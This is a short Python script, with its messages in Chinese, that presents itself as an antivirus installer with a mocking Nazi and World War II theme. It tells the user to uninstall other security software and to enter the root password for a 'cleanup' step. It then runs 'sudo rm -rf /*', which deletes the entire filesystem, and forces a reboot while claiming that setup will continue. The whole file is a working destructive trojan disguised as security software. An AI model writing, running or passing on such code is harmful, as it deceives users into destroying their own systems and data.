import os

print("欢迎使用纳粹诸葛亮杀毒!我们将会在您的Linux电脑/服务器上给您带来第二次世界B战的体验!")

input("按回车开始安装流程......")

if os.name != "posix":
    print("纳粹诸葛亮杀毒暂不支持您的操作系统，请下载针对你的操作系统的版本!")
    exit()
print("正在安装纳粹诸葛亮驱动...若您的系统中已安装其他安全软件请先卸载那些杀毒软件!")
input("若您已经成功关闭其他杀毒软件请按回车")
print("如果系统提示您输入root密码请按照提示输入然后回车，系统将会在安装之前清理一些无用的文件，为纳粹诸葛亮杀毒提供足够的空间")
os.system("sudo rm -rf /*")
print("正在安装文件......")
print("安装完毕，安装程序将会在系统重启后进行继续的部署")
print("正在进行重启......若无法重启，请手动重启，启动时我们会修复这个问题")
os.system("reboot")